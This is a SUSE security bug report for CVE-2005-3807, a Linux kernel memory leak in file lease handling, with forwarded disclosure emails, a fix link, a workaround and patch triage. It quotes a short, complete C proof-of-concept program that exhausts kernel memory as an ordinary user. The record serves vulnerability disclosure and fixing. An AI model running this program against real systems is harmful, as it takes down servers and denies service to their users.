Bug 133803 (CVE-2005-3807)

Summary:	VUL-0: CVE-2005-3807: kernel: file leases lead to oom
Product:	[Novell Products] SUSE Security Incidents	Reporter:	Ludwig Nussel <lnussel>
Component:	Incidents	Assignee:	Lars Marowsky-Bree <lmb>
Status:	RESOLVED FIXED	QA Contact:	Security Team bot <security-team>
Severity:	Normal
Priority:	P5 - None	CC:	security-team
Version:	unspecified
Target Milestone:	---
Hardware:	Other
OS:	Other
Whiteboard:	CVE-2005-3807: CVSS v2 Base Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Found By:	Other	Services Priority:
Business Priority:		Blocker:	---
Marketing QA Status:	---	IT Deployment:	---

Description Ludwig Nussel 2005-11-15 08:05:07 UTC

We received the following report via vendor-sec.
The issue is public.

Date: Mon, 14 Nov 2005 10:43:29 -0800
From: Chris Wright <chrisw@osdl.org>
To: vendor-sec@lst.de
Subject: [vendor-sec] [avi@argo.co.il: local denial-of-service with file leases]

Memory leak easily triggered by normal samba usage.  Fix:

http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff_plain;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e;hp=9e6c67fd2716720d9029d38ea25884efcfdedeb6

thanks,
-chris

----- Forwarded message from Avi Kivity <avi@argo.co.il> -----

Date: 	Thu, 10 Nov 2005 19:00:46 +0200
From: Avi Kivity <avi@argo.co.il>
To: linux-kernel <linux-kernel@vger.kernel.org>
Subject: local denial-of-service with file leases
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc4 (X11/20050929)

the following program will oom a the 2.6.14.1 kernel, running as an 
ordinary user:

#include <unistd.h>

#include <stdlib.h>

#include <linux/fcntl.h>

int main(int ac, char **av)

{

   char *fname = av[0];

   int fd = open(fname, O_RDONLY);

   int r;

   

   while (1) {

       r = fcntl(fd, F_SETLEASE, F_RDLCK);

       if (r == -1) {

           perror("F_SETLEASE, F_RDLCK");

           exit(1);

       }

       r = fcntl(fd, F_SETLEASE, F_UNLCK);

       if (r == -1) {

           perror("F_SETLEASE, F_UNLCK");

           exit(1);

       }

   }

   return 0;

}

it will suck all available memory into fasync_cache, causing an oom. a 
workaround is to set fs.leases-enable to 0.

this has already been reported to lkml[1] and fedora[2], with no effect.

[1] http://www.ussg.iu.edu/hypermail/linux/kernel/0510.2/1589.html
[2] https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=172691

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/

----- End forwarded message -----
_______________________________________________
Vendor Security mailing list
Vendor Security@lst.de
https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec

Comment 1 Lars Marowsky-Bree 2005-11-15 08:30:18 UTC

Ludwig, is it enough to fix this bug for HEAD?

Comment 2 Ludwig Nussel 2005-11-15 08:39:56 UTC

Well, if "normal" (ie not even malicious) samba usage can kill your shiny suse linux server I vote for fixing it in all affected kernels.

Comment 3 Lars Marowsky-Bree 2005-11-15 09:14:32 UTC

SLES9, SL92 are _not_ affected.

Committed to SL93, SL100, HEAD.

Comment 4 Marcus Meissner 2005-11-28 06:35:49 UTC

======================================================
Name: CVE-2005-3807
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3807
Reference: CONFIRM:http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e

Memory leak in the VFS file lease handling in locks.c in Linux kernels
2.6.10 to 2.6.15 allows local users to cause a denial of service
(memory exhaustion) via certain Samba activities that cause an fasync
entry to be re-allocated after the fasync queue has already been
cleaned.

Comment 5 Thomas Biege 2009-10-13 20:35:08 UTC

CVE-2005-3807: CVSS v2 Base Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)